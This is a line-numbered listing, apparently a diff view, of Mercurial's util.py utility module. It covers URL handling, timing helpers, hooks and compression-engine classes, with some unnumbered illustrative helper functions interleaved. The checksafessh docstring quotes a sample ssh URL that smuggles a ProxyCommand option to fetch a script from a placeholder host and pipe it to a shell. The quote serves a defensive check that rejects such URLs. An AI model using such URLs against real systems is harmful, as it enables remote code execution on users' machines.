2648 2656 if not self.query:
2649 2657 self.query = None
2650 2658
2651 2659 # // is required to specify a host/authority
2652 2660 if path and path.startswith('//'):
2653 2661 parts = path[2:].split('/', 1)
2654 2662 if len(parts) > 1:
2655 2663 self.host, path = parts
2656 2664 else:
2657 2665 self.host = parts[0]
2658 2666 path = None
2659 2667 if not self.host:
2660 2668 self.host = None
2661 2669 # path of file:///d is /d
2662 2670 # path of file:///d:/ is d:/, not /d:/
2663 2671 if path and not hasdriveletter(path):
2664 2672 path = '/' + path
2665 2673
2666 2674 if self.host and '@' in self.host:
2667 2675 self.user, self.host = self.host.rsplit('@', 1)
2668 2676 if ':' in self.user:
2669 2677 self.user, self.passwd = self.user.split(':', 1)
2670 2678 if not self.host:
2671 2679 self.host = None
2672 2680
2673 2681 # Don't split on colons in IPv6 addresses without ports
2674 2682 if (self.host and ':' in self.host and
2675 2683 not (self.host.startswith('[') and self.host.endswith(']'))):
2676 2684 self._hostport = self.host
2677 2685 self.host, self.port = self.host.rsplit(':', 1)
2678 2686 if not self.host:
2679 2687 self.host = None
2680 2688
2681 2689 if (self.host and self.scheme == 'file' and
2682 2690 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2683 2691 raise error.Abort(_('file:// URLs can only refer to localhost'))
2684 2692
2685 2693 self.path = path
2686 2694
2687 2695 # leave the query string escaped
2688 2696 for a in ('user', 'passwd', 'host', 'port',
2689 2697 'path', 'fragment'):
2690 2698 v = getattr(self, a)
2691 2699 if v is not None:
2692 2700 setattr(self, a, urlreq.unquote(v))
2693 2701
2694 2702 @encoding.strmethod
2695 2703 def __repr__(self):
2696 2704 attrs = []
2697 2705 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2698 2706 'query', 'fragment'):
2699 2707 v = getattr(self, a)
2700 2708 if v is not None:
2701 2709 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2702 2710 return '<url %s>' % ', '.join(attrs)
2703 2711
2704 2712 def __bytes__(self):
2705 2713 r"""Join the URL's components back into a URL string.
2706 2714
2707 2715 Examples:
2708 2716
2709 2717 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2710 2718 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2711 2719 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2712 2720 'http://user:pw@host:80/?foo=bar&baz=42'
2713 2721 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2714 2722 'http://user:pw@host:80/?foo=bar%3dbaz'
2715 2723 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2716 2724 'ssh://user:pw@[::1]:2200//home/joe#'
2717 2725 >>> bytes(url(b'http://localhost:80//'))
2718 2726 'http://localhost:80//'
2719 2727 >>> bytes(url(b'http://localhost:80/'))
2720 2728 'http://localhost:80/'
2721 2729 >>> bytes(url(b'http://localhost:80'))
2722 2730 'http://localhost:80/'
2723 2731 >>> bytes(url(b'bundle:foo'))
2724 2732 'bundle:foo'
2725 2733 >>> bytes(url(b'bundle://../foo'))
2726 2734 'bundle:../foo'
2727 2735 >>> bytes(url(b'path'))
2728 2736 'path'
2729 2737 >>> bytes(url(b'file:///tmp/foo/bar'))
2730 2738 'file:///tmp/foo/bar'
2731 2739 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2732 2740 'file:///c:/tmp/foo/bar'
2733 2741 >>> print(url(br'bundle:foo\bar'))
2734 2742 bundle:foo\bar
2735 2743 >>> print(url(br'file:///D:\data\hg'))
2736 2744 file:///D:\data\hg
2737 2745 """
2738 2746 if self._localpath:
2739 2747 s = self.path
2740 2748 if self.scheme == 'bundle':
2741 2749 s = 'bundle:' + s
2742 2750 if self.fragment:
2743 2751 s += '#' + self.fragment
2744 2752 return s
2745 2753
2746 2754 s = self.scheme + ':'
2747 2755 if self.user or self.passwd or self.host:
2748 2756 s += '//'
2749 2757 elif self.scheme and (not self.path or self.path.startswith('/')
2750 2758 or hasdriveletter(self.path)):
2751 2759 s += '//'
2752 2760 if hasdriveletter(self.path):
2753 2761 s += '/'
2754 2762 if self.user:
2755 2763 s += urlreq.quote(self.user, safe=self._safechars)
2756 2764 if self.passwd:
2757 2765 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2758 2766 if self.user or self.passwd:
2759 2767 s += '@'
2760 2768 if self.host:
2761 2769 if not (self.host.startswith('[') and self.host.endswith(']')):
2762 2770 s += urlreq.quote(self.host)
2763 2771 else:
2764 2772 s += self.host
2765 2773 if self.port:
2766 2774 s += ':' + urlreq.quote(self.port)
2767 2775 if self.host:
2768 2776 s += '/'
2769 2777 if self.path:
2770 2778 # TODO: similar to the query string, we should not unescape the
2771 2779 # path when we store it, the path might contain '%2f' = '/',
2772 2780 # which we should *not* escape.
2773 2781 s += urlreq.quote(self.path, safe=self._safepchars)
2774 2782 if self.query:
2775 2783 # we store the query in escaped form.
2776 2784 s += '?' + self.query
2777 2785 if self.fragment is not None:
2778 2786 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2779 2787 return s
2780 2788
2781 2789 __str__ = encoding.strmethod(__bytes__)
2782 2790
2783 2791 def authinfo(self):
2784 2792 user, passwd = self.user, self.passwd
2785 2793 try:
2786 2794 self.user, self.passwd = None, None
2787 2795 s = bytes(self)
2788 2796 finally:
2789 2797 self.user, self.passwd = user, passwd
2790 2798 if not self.user:
2791 2799 return (s, None)
2792 2800 # authinfo[1] is passed to urllib2 password manager, and its
2793 2801 # URIs must not contain credentials. The host is passed in the
2794 2802 # URIs list because Python < 2.4.3 uses only that to search for
2795 2803 # a password.
2796 2804 return (s, (None, (s, self.host),
2797 2805 self.user, self.passwd or ''))
2798 2806
2799 2807 def isabs(self):
2800 2808 if self.scheme and self.scheme != 'file':
2801 2809 return True # remote URL
2802 2810 if hasdriveletter(self.path):
2803 2811 return True # absolute for our purposes - can't be joined()
2804 2812 if self.path.startswith(br'\\'):
2805 2813 return True # Windows UNC path
2806 2814 if self.path.startswith('/'):
2807 2815 return True # POSIX-style
2808 2816 return False
2809 2817
2810 2818 def localpath(self):
2811 2819 if self.scheme == 'file' or self.scheme == 'bundle':
2812 2820 path = self.path or '/'
2813 2821 # For Windows, we need to promote hosts containing drive
2814 2822 # letters to paths with drive letters.
2815 2823 if hasdriveletter(self._hostport):
2816 2824 path = self._hostport + '/' + self.path
2817 2825 elif (self.host is not None and self.path
2818 2826 and not hasdriveletter(path)):
2819 2827 path = '/' + path
2820 2828 return path
2821 2829 return self._origpath
2822 2830
2823 2831 def islocal(self):
2824 2832 '''whether localpath will return something that posixfile can open'''
2825 2833 return (not self.scheme or self.scheme == 'file'
2826 2834 or self.scheme == 'bundle')
2827 2835
2828 2836 def hasscheme(path):
2829 2837 return bool(url(path).scheme)
2830 2838
2831 2839 def hasdriveletter(path):
2832 2840 return path and path[1:2] == ':' and path[0:1].isalpha()
2833 2841
2834 2842 def urllocalpath(path):
2835 2843 return url(path, parsequery=False, parsefragment=False).localpath()
2836 2844
2837 2845 def checksafessh(path):
2838 2846 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2839 2847
2840 2848 This is a sanity check for ssh urls. ssh will parse the first item as
2841 2849 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2842 2850 Let's prevent these potentially exploited urls entirely and warn the
2843 2851 user.
2844 2852
2845 2853 Raises an error.Abort when the url is unsafe.
2846 2854 """
2847 2855 path = urlreq.unquote(path)
2848 2856 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2849 2857 raise error.Abort(_('potentially unsafe url: %r') %
2850 2858 (pycompat.bytestr(path),))
2851 2859
2852 2860 def hidepassword(u):
2853 2861 '''hide user credential in a url string'''
2854 2862 u = url(u)
2855 2863 if u.passwd:
2856 2864 u.passwd = '***'
2857 2865 return bytes(u)
2858 2866
2859 2867 def removeauth(u):
2860 2868 '''remove all authentication information from a url string'''
2861 2869 u = url(u)
2862 2870 u.user = u.passwd = None
2863 2871 return bytes(u)
2864 2872
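# Illustrative sketch (not called anywhere): scrubbing credentials from a
# URL before logging or display; the result is
# b'http://joe:***@example.com/repo'.
def _hidepasswordexample():
    return hidepassword(b'http://joe:secret@example.com/repo')
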
2865 2873 timecount = unitcountfn(
2866 2874 (1, 1e3, _('%.0f s')),
2867 2875 (100, 1, _('%.1f s')),
2868 2876 (10, 1, _('%.2f s')),
2869 2877 (1, 1, _('%.3f s')),
2870 2878 (100, 0.001, _('%.1f ms')),
2871 2879 (10, 0.001, _('%.2f ms')),
2872 2880 (1, 0.001, _('%.3f ms')),
2873 2881 (100, 0.000001, _('%.1f us')),
2874 2882 (10, 0.000001, _('%.2f us')),
2875 2883 (1, 0.000001, _('%.3f us')),
2876 2884 (100, 0.000000001, _('%.1f ns')),
2877 2885 (10, 0.000000001, _('%.2f ns')),
2878 2886 (1, 0.000000001, _('%.3f ns')),
2879 2887 )
2880 2888
2881 2889 @attr.s
2882 2890 class timedcmstats(object):
2883 2891 """Stats information produced by the timedcm context manager on entering."""
2884 2892
2885 2893 # the starting value of the timer as a float (meaning and resolution are
2886 2894 # platform dependent, see util.timer)
2887 2895 start = attr.ib(default=attr.Factory(lambda: timer()))
2888 2896 # the number of seconds as a floating point value; starts at 0, updated when
2889 2897 # the context is exited.
2890 2898 elapsed = attr.ib(default=0)
2891 2899 # the number of nested timedcm context managers.
2892 2900 level = attr.ib(default=1)
2893 2901
2894 2902 def __bytes__(self):
2895 2903 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2896 2904
2897 2905 __str__ = encoding.strmethod(__bytes__)
2898 2906
2899 2907 @contextlib.contextmanager
2900 2908 def timedcm(whencefmt, *whenceargs):
2901 2909 """A context manager that produces timing information for a given context.
2902 2910
2903 2911 On entering, a timedcmstats instance is produced.
2904 2912
2905 2913 This context manager is reentrant.
2906 2914
2907 2915 """
2908 2916 # track nested context managers
2909 2917 timedcm._nested += 1
2910 2918 timing_stats = timedcmstats(level=timedcm._nested)
2911 2919 try:
2912 2920 with tracing.log(whencefmt, *whenceargs):
2913 2921 yield timing_stats
2914 2922 finally:
2915 2923 timing_stats.elapsed = timer() - timing_stats.start
2916 2924 timedcm._nested -= 1
2917 2925
2918 2926 timedcm._nested = 0
2919 2927
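# Illustrative sketch (not called anywhere): timing a block of code with
# the reentrant timedcm context manager.
def _timedcmexample():
    with timedcm(b'example work') as stats:
        pass  # ... code under measurement ...
    return stats.elapsed  # elapsed seconds as a float
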
2920 2928 def timed(func):
2921 2929 '''Report the execution time of a function call to stderr.
2922 2930
2923 2931 During development, use as a decorator when you need to measure
2924 2932 the cost of a function, e.g. as follows:
2925 2933
2926 2934 @util.timed
2927 2935 def foo(a, b, c):
2928 2936 pass
2929 2937 '''
2930 2938
2931 2939 def wrapper(*args, **kwargs):
2932 2940 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
2933 2941 result = func(*args, **kwargs)
2934 2942 stderr = procutil.stderr
2935 2943 stderr.write('%s%s: %s\n' % (
2936 2944 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
2937 2945 time_stats))
2938 2946 return result
2939 2947 return wrapper
2940 2948
2941 2949 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2942 2950 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2943 2951
2944 2952 def sizetoint(s):
2945 2953 '''Convert a size specifier to a byte count.
2946 2954
2947 2955 >>> sizetoint(b'30')
2948 2956 30
2949 2957 >>> sizetoint(b'2.2kb')
2950 2958 2252
2951 2959 >>> sizetoint(b'6M')
2952 2960 6291456
2953 2961 '''
2954 2962 t = s.strip().lower()
2955 2963 try:
2956 2964 for k, u in _sizeunits:
2957 2965 if t.endswith(k):
2958 2966 return int(float(t[:-len(k)]) * u)
2959 2967 return int(t)
2960 2968 except ValueError:
2961 2969 raise error.ParseError(_("couldn't parse size: %s") % s)
2962 2970
2963 2971 class hooks(object):
2964 2972 '''A collection of hook functions that can be used to extend a
2965 2973 function's behavior. Hooks are called in lexicographic order,
2966 2974 based on the names of their sources.'''
2967 2975
2968 2976 def __init__(self):
2969 2977 self._hooks = []
2970 2978
2971 2979 def add(self, source, hook):
2972 2980 self._hooks.append((source, hook))
2973 2981
2974 2982 def __call__(self, *args):
2975 2983 self._hooks.sort(key=lambda x: x[0])
2976 2984 results = []
2977 2985 for source, hook in self._hooks:
2978 2986 results.append(hook(*args))
2979 2987 return results
2980 2988
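# Illustrative sketch (not called anywhere): hooks runs registered
# callables in lexicographic order of their source names, not in
# insertion order. The source names below are hypothetical.
def _hooksexample():
    h = hooks()
    h.add(b'zzz-source', lambda: 2)
    h.add(b'aaa-source', lambda: 1)
    return h()  # -> [1, 2]
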
2981 2989 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2982 2990 '''Yields lines for a nicely formatted stacktrace.
2983 2991 Skips the 'skip' last entries, then return the last 'depth' entries.
2984 2992 Each file+linenumber is formatted according to fileline.
2985 2993 Each line is formatted according to line.
2986 2994 If line is None, it yields:
2987 2995 length of longest filepath+line number,
2988 2996 filepath+linenumber,
2989 2997 function
2990 2998
2991 2999 Not to be used in production code, but very convenient while developing.
2992 3000 '''
2993 3001 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2994 3002 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2995 3003 ][-depth:]
2996 3004 if entries:
2997 3005 fnmax = max(len(entry[0]) for entry in entries)
2998 3006 for fnln, func in entries:
2999 3007 if line is None:
3000 3008 yield (fnmax, fnln, func)
3001 3009 else:
3002 3010 yield line % (fnmax, fnln, func)
3003 3011
3004 3012 def debugstacktrace(msg='stacktrace', skip=0,
3005 3013 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3006 3014 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3007 3015 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3008 3016 By default it will flush stdout first.
3009 3017 It can be used everywhere and intentionally does not require an ui object.
3010 3018 Not to be used in production code, but very convenient while developing.
3011 3019 '''
3012 3020 if otherf:
3013 3021 otherf.flush()
3014 3022 f.write('%s at:\n' % msg.rstrip())
3015 3023 for line in getstackframes(skip + 1, depth=depth):
3016 3024 f.write(line)
3017 3025 f.flush()
3018 3026
3019 3027 class dirs(object):
3020 3028 '''a multiset of directory names from a dirstate or manifest'''
3021 3029
3022 3030 def __init__(self, map, skip=None):
3023 3031 self._dirs = {}
3024 3032 addpath = self.addpath
3025 3033 if safehasattr(map, 'iteritems') and skip is not None:
3026 3034 for f, s in map.iteritems():
3027 3035 if s[0] != skip:
3028 3036 addpath(f)
3029 3037 else:
3030 3038 for f in map:
3031 3039 addpath(f)
3032 3040
3033 3041 def addpath(self, path):
3034 3042 dirs = self._dirs
3035 3043 for base in finddirs(path):
3036 3044 if base in dirs:
3037 3045 dirs[base] += 1
3038 3046 return
3039 3047 dirs[base] = 1
3040 3048
3041 3049 def delpath(self, path):
3042 3050 dirs = self._dirs
3043 3051 for base in finddirs(path):
3044 3052 if dirs[base] > 1:
3045 3053 dirs[base] -= 1
3046 3054 return
3047 3055 del dirs[base]
3048 3056
3049 3057 def __iter__(self):
3050 3058 return iter(self._dirs)
3051 3059
3052 3060 def __contains__(self, d):
3053 3061 return d in self._dirs
3054 3062
3055 3063 if safehasattr(parsers, 'dirs'):
3056 3064 dirs = parsers.dirs
3057 3065
3058 3066 def finddirs(path):
3059 3067 pos = path.rfind('/')
3060 3068 while pos != -1:
3061 3069 yield path[:pos]
3062 3070 pos = path.rfind('/', 0, pos)
3063 3071
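# Illustrative sketch (not called anywhere): finddirs yields the parent
# directories of a slash-separated path, deepest first.
def _finddirsexample():
    return list(finddirs(b'a/b/c'))  # -> [b'a/b', b'a']
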
3064 3072 # compression code
3065 3073
3066 3074 SERVERROLE = 'server'
3067 3075 CLIENTROLE = 'client'
3068 3076
3069 3077 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3070 3078 (u'name', u'serverpriority',
3071 3079 u'clientpriority'))
3072 3080
3073 3081 class compressormanager(object):
3074 3082 """Holds registrations of various compression engines.
3075 3083
3076 3084 This class essentially abstracts the differences between compression
3077 3085 engines to allow new compression formats to be added easily, possibly from
3078 3086 extensions.
3079 3087
3080 3088 Compressors are registered against the global instance by calling its
3081 3089 ``register()`` method.
3082 3090 """
3083 3091 def __init__(self):
3084 3092 self._engines = {}
3085 3093 # Bundle spec human name to engine name.
3086 3094 self._bundlenames = {}
3087 3095 # Internal bundle identifier to engine name.
3088 3096 self._bundletypes = {}
3089 3097 # Revlog header to engine name.
3090 3098 self._revlogheaders = {}
3091 3099 # Wire proto identifier to engine name.
3092 3100 self._wiretypes = {}
3093 3101
3094 3102 def __getitem__(self, key):
3095 3103 return self._engines[key]
3096 3104
3097 3105 def __contains__(self, key):
3098 3106 return key in self._engines
3099 3107
3100 3108 def __iter__(self):
3101 3109 return iter(self._engines.keys())
3102 3110
3103 3111 def register(self, engine):
3104 3112 """Register a compression engine with the manager.
3105 3113
3106 3114 The argument must be a ``compressionengine`` instance.
3107 3115 """
3108 3116 if not isinstance(engine, compressionengine):
3109 3117 raise ValueError(_('argument must be a compressionengine'))
3110 3118
3111 3119 name = engine.name()
3112 3120
3113 3121 if name in self._engines:
3114 3122 raise error.Abort(_('compression engine %s already registered') %
3115 3123 name)
3116 3124
3117 3125 bundleinfo = engine.bundletype()
3118 3126 if bundleinfo:
3119 3127 bundlename, bundletype = bundleinfo
3120 3128
3121 3129 if bundlename in self._bundlenames:
3122 3130 raise error.Abort(_('bundle name %s already registered') %
3123 3131 bundlename)
3124 3132 if bundletype in self._bundletypes:
3125 3133 raise error.Abort(_('bundle type %s already registered by %s') %
3126 3134 (bundletype, self._bundletypes[bundletype]))
3127 3135
3128 3136 # Register the external-facing name only if one was declared.
3129 3137 if bundlename:
3130 3138 self._bundlenames[bundlename] = name
3131 3139
3132 3140 self._bundletypes[bundletype] = name
3133 3141
3134 3142 wiresupport = engine.wireprotosupport()
3135 3143 if wiresupport:
3136 3144 wiretype = wiresupport.name
3137 3145 if wiretype in self._wiretypes:
3138 3146 raise error.Abort(_('wire protocol compression %s already '
3139 3147 'registered by %s') %
3140 3148 (wiretype, self._wiretypes[wiretype]))
3141 3149
3142 3150 self._wiretypes[wiretype] = name
3143 3151
3144 3152 revlogheader = engine.revlogheader()
3145 3153 if revlogheader and revlogheader in self._revlogheaders:
3146 3154 raise error.Abort(_('revlog header %s already registered by %s') %
3147 3155 (revlogheader, self._revlogheaders[revlogheader]))
3148 3156
3149 3157 if revlogheader:
3150 3158 self._revlogheaders[revlogheader] = name
3151 3159
3152 3160 self._engines[name] = engine
3153 3161
3154 3162 @property
3155 3163 def supportedbundlenames(self):
3156 3164 return set(self._bundlenames.keys())
3157 3165
3158 3166 @property
3159 3167 def supportedbundletypes(self):
3160 3168 return set(self._bundletypes.keys())
3161 3169
3162 3170 def forbundlename(self, bundlename):
3163 3171 """Obtain a compression engine registered to a bundle name.
3164 3172
3165 3173 Will raise KeyError if the bundle type isn't registered.
3166 3174
3167 3175 Will abort if the engine is known but not available.
3168 3176 """
3169 3177 engine = self._engines[self._bundlenames[bundlename]]
3170 3178 if not engine.available():
3171 3179 raise error.Abort(_('compression engine %s could not be loaded') %
3172 3180 engine.name())
3173 3181 return engine
3174 3182
3175 3183 def forbundletype(self, bundletype):
3176 3184 """Obtain a compression engine registered to a bundle type.
3177 3185
3178 3186 Will raise KeyError if the bundle type isn't registered.
3179 3187
3180 3188 Will abort if the engine is known but not available.
3181 3189 """
3182 3190 engine = self._engines[self._bundletypes[bundletype]]
3183 3191 if not engine.available():
3184 3192 raise error.Abort(_('compression engine %s could not be loaded') %
3185 3193 engine.name())
3186 3194 return engine
3187 3195
3188 3196 def supportedwireengines(self, role, onlyavailable=True):
3189 3197 """Obtain compression engines that support the wire protocol.
3190 3198
3191 3199 Returns a list of engines in prioritized order, most desired first.
3192 3200
3193 3201 If ``onlyavailable`` is set, filter out engines that can't be
3194 3202 loaded.
3195 3203 """
3196 3204 assert role in (SERVERROLE, CLIENTROLE)
3197 3205
3198 3206 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3199 3207
3200 3208 engines = [self._engines[e] for e in self._wiretypes.values()]
3201 3209 if onlyavailable:
3202 3210 engines = [e for e in engines if e.available()]
3203 3211
3204 3212 def getkey(e):
3205 3213 # Sort first by priority, highest first. In case of tie, sort
3206 3214 # alphabetically. This is arbitrary, but ensures output is
3207 3215 # stable.
3208 3216 w = e.wireprotosupport()
3209 3217 return -1 * getattr(w, attr), w.name
3210 3218
3211 3219 return list(sorted(engines, key=getkey))
3212 3220
3213 3221 def forwiretype(self, wiretype):
3214 3222 engine = self._engines[self._wiretypes[wiretype]]
3215 3223 if not engine.available():
3216 3224 raise error.Abort(_('compression engine %s could not be loaded') %
3217 3225 engine.name())
3218 3226 return engine
3219 3227
3220 3228 def forrevlogheader(self, header):
3221 3229 """Obtain a compression engine registered to a revlog header.
3222 3230
3223 3231 Will raise KeyError if the revlog header value isn't registered.
3224 3232 """
3225 3233 return self._engines[self._revlogheaders[header]]
3226 3234
3227 3235 compengines = compressormanager()
3228 3236
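# Illustrative sketch (not called anywhere): an extension would register
# a new engine against the global manager and clients would look it up
# by its user-facing bundle name. ``myengine`` is a hypothetical
# compressionengine instance, not part of this module.
def _compengineexample(myengine):
    compengines.register(myengine)
    bundlename = myengine.bundletype()[0]
    return compengines.forbundlename(bundlename)
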
3229 3237 class compressionengine(object):
3230 3238 """Base class for compression engines.
3231 3239
3232 3240 Compression engines must implement the interface defined by this class.
3233 3241 """
3234 3242 def name(self):
3235 3243 """Returns the name of the compression engine.
3236 3244
3237 3245 This is the key the engine is registered under.
3238 3246
3239 3247 This method must be implemented.
3240 3248 """
3241 3249 raise NotImplementedError()
3242 3250
3243 3251 def available(self):
3244 3252 """Whether the compression engine is available.
3245 3253
3246 3254 The intent of this method is to allow optional compression engines
3247 3255 that may not be available in all installations (such as engines relying
3248 3256 on C extensions that may not be present).
3249 3257 """
3250 3258 return True
3251 3259
3252 3260 def bundletype(self):
3253 3261 """Describes bundle identifiers for this engine.
3254 3262
3255 3263 If this compression engine isn't supported for bundles, returns None.
3256 3264
3257 3265 If this engine can be used for bundles, returns a 2-tuple of strings of
3258 3266 the user-facing "bundle spec" compression name and an internal
3259 3267 identifier used to denote the compression format within bundles. To
3260 3268 exclude the name from external usage, set the first element to ``None``.
3261 3269
3262 3270 If bundle compression is supported, the class must also implement
3263 3271 ``compressstream`` and ``decompressorreader``.
3264 3272
3265 3273 The docstring of this method is used in the help system to tell users
3266 3274 about this engine.
3267 3275 """
3268 3276 return None
3269 3277
3270 3278 def wireprotosupport(self):
3271 3279 """Declare support for this compression format on the wire protocol.
3272 3280
3273 3281 If this compression engine isn't supported for compressing wire
3274 3282 protocol payloads, returns None.
3275 3283
3276 3284 Otherwise, returns ``compenginewireprotosupport`` with the following
3277 3285 fields:
3278 3286
3279 3287 * String format identifier
3280 3288 * Integer priority for the server
3281 3289 * Integer priority for the client
3282 3290
3283 3291 The integer priorities are used to order the advertisement of format
3284 3292 support by server and client. The highest integer is advertised
3285 3293 first. Integers with non-positive values aren't advertised.
3286 3294
3287 3295 The priority values are somewhat arbitrary and only used for default
3288 3296 ordering. The relative order can be changed via config options.
3289 3297
3290 3298 If wire protocol compression is supported, the class must also implement
3291 3299 ``compressstream`` and ``decompressorreader``.
3292 3300 """
3293 3301 return None
3294 3302
3295 3303 def revlogheader(self):
3296 3304 """Header added to revlog chunks that identifies this engine.
3297 3305
3298 3306 If this engine can be used to compress revlogs, this method should
3299 3307 return the bytes used to identify chunks compressed with this engine.
3300 3308 Else, the method should return ``None`` to indicate it does not
3301 3309 participate in revlog compression.
3302 3310 """
3303 3311 return None
3304 3312
3305 3313 def compressstream(self, it, opts=None):
3306 3314 """Compress an iterator of chunks.
3307 3315
3308 3316 The method receives an iterator (ideally a generator) of chunks of
3309 3317 bytes to be compressed. It returns an iterator (ideally a generator)
3310 3318 of chunks of bytes representing the compressed output.
3311 3319
3312 3320 Optionally accepts an argument defining how to perform compression.
3313 3321 Each engine treats this argument differently.
3314 3322 """
3315 3323 raise NotImplementedError()
3316 3324
3317 3325 def decompressorreader(self, fh):
3318 3326 """Perform decompression on a file object.
3319 3327
3320 3328 Argument is an object with a ``read(size)`` method that returns
3321 3329 compressed data. Return value is an object with a ``read(size)`` method
3322 3330 that returns uncompressed data.
3323 3331 """
3324 3332 raise NotImplementedError()
3325 3333
3326 3334 def revlogcompressor(self, opts=None):
3327 3335 """Obtain an object that can be used to compress revlog entries.
3328 3336
3329 3337 The object has a ``compress(data)`` method that compresses binary
3330 3338 data. This method returns compressed binary data or ``None`` if
3331 3339 the data could not be compressed (too small, not compressible, etc).
3332 3340 The returned data should have a header uniquely identifying this
3333 3341 compression format so decompression can be routed to this engine.
3334 3342 This header should be identified by the ``revlogheader()`` return
3335 3343 value.
3336 3344
3337 3345 The object has a ``decompress(data)`` method that decompresses
3338 3346 data. The method will only be called if ``data`` begins with
3339 3347 ``revlogheader()``. The method should return the raw, uncompressed
3340 3348 data or raise a ``RevlogError``.
3341 3349
3342 3350 The object is reusable but is not thread safe.
3343 3351 """
3344 3352 raise NotImplementedError()
3345 3353
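# A minimal hypothetical engine, shown only to illustrate the interface
# above (the 'passthrough' name and class are assumptions, not part of
# Mercurial). It opts out of bundles, the wire protocol, and revlogs by
# inheriting the default ``None`` returns, and forwards data unchanged.
class _passthroughengine(compressionengine):
    def name(self):
        return 'passthrough'

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

# Registration would then be: compengines.register(_passthroughengine())
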
3346 3354 class _CompressedStreamReader(object):
3347 3355 def __init__(self, fh):
3348 3356 if safehasattr(fh, 'unbufferedread'):
3349 3357 self._reader = fh.unbufferedread
3350 3358 else:
3351 3359 self._reader = fh.read
3352 3360 self._pending = []
3353 3361 self._pos = 0
3354 3362 self._eof = False
3355 3363
3356 3364 def _decompress(self, chunk):
3357 3365 raise NotImplementedError()
3358 3366
3359 3367 def read(self, l):
3360 3368 buf = []
3361 3369 while True:
3362 3370 while self._pending:
3363 3371 if len(self._pending[0]) > l + self._pos:
3364 3372 newbuf = self._pending[0]
3365 3373 buf.append(newbuf[self._pos:self._pos + l])
3366 3374 self._pos += l
3367 3375 return ''.join(buf)
3368 3376
3369 3377 newbuf = self._pending.pop(0)
3370 3378 if self._pos:
3371 3379 buf.append(newbuf[self._pos:])
3372 3380 l -= len(newbuf) - self._pos
3373 3381 else:
3374 3382 buf.append(newbuf)
3375 3383 l -= len(newbuf)
3376 3384 self._pos = 0
3377 3385
3378 3386 if self._eof:
3379 3387 return ''.join(buf)
3380 3388 chunk = self._reader(65536)
3381 3389 self._decompress(chunk)
3382 3390 if not chunk and not self._pending and not self._eof:
3383 3391 # No progress and no new data, bail out
3384 3392 return ''.join(buf)
3385 3393
3386 3394 class _GzipCompressedStreamReader(_CompressedStreamReader):
3387 3395 def __init__(self, fh):
3388 3396 super(_GzipCompressedStreamReader, self).__init__(fh)
3389 3397 self._decompobj = zlib.decompressobj()
3390 3398 def _decompress(self, chunk):
3391 3399 newbuf = self._decompobj.decompress(chunk)
3392 3400 if newbuf:
3393 3401 self._pending.append(newbuf)
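# Probe for end of stream: feed a dummy byte to a *copy* of the
# decompressor. Once the underlying zlib stream has ended, any extra
# input is reported back verbatim via ``unused_data``.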
3394 3402 d = self._decompobj.copy()
3395 3403 try:
3396 3404 d.decompress('x')
3397 3405 d.flush()
3398 3406 if d.unused_data == 'x':
3399 3407 self._eof = True
3400 3408 except zlib.error:
3401 3409 pass
3402 3410
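# Hedged usage sketch (hypothetical helper; assumes the Python 2 string
# semantics used throughout this file, where '' literals are bytes):
def _example_gzip_reader():
    import io
    payload = b'hello world'
    reader = _GzipCompressedStreamReader(io.BytesIO(zlib.compress(payload)))
    assert reader.read(len(payload)) == payload
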
3403 3411 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3404 3412 def __init__(self, fh):
3405 3413 super(_BZ2CompressedStreamReader, self).__init__(fh)
3406 3414 self._decompobj = bz2.BZ2Decompressor()
3407 3415 def _decompress(self, chunk):
3408 3416 newbuf = self._decompobj.decompress(chunk)
3409 3417 if newbuf:
3410 3418 self._pending.append(newbuf)
3411 3419 try:
3412 3420 while True:
3413 3421 newbuf = self._decompobj.decompress('')
3414 3422 if newbuf:
3415 3423 self._pending.append(newbuf)
3416 3424 else:
3417 3425 break
3418 3426 except EOFError:
3419 3427 self._eof = True
3420 3428
3421 3429 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3422 3430 def __init__(self, fh):
3423 3431 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3424 3432 newbuf = self._decompobj.decompress('BZ')
3425 3433 if newbuf:
3426 3434 self._pending.append(newbuf)
3427 3435
3428 3436 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3429 3437 def __init__(self, fh, zstd):
3430 3438 super(_ZstdCompressedStreamReader, self).__init__(fh)
3431 3439 self._zstd = zstd
3432 3440 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3433 3441 def _decompress(self, chunk):
3434 3442 newbuf = self._decompobj.decompress(chunk)
3435 3443 if newbuf:
3436 3444 self._pending.append(newbuf)
3437 3445 try:
3438 3446 while True:
3439 3447 newbuf = self._decompobj.decompress('')
3440 3448 if newbuf:
3441 3449 self._pending.append(newbuf)
3442 3450 else:
3443 3451 break
3444 3452 except self._zstd.ZstdError:
3445 3453 self._eof = True
3446 3454
3447 3455 class _zlibengine(compressionengine):
3448 3456 def name(self):
3449 3457 return 'zlib'
3450 3458
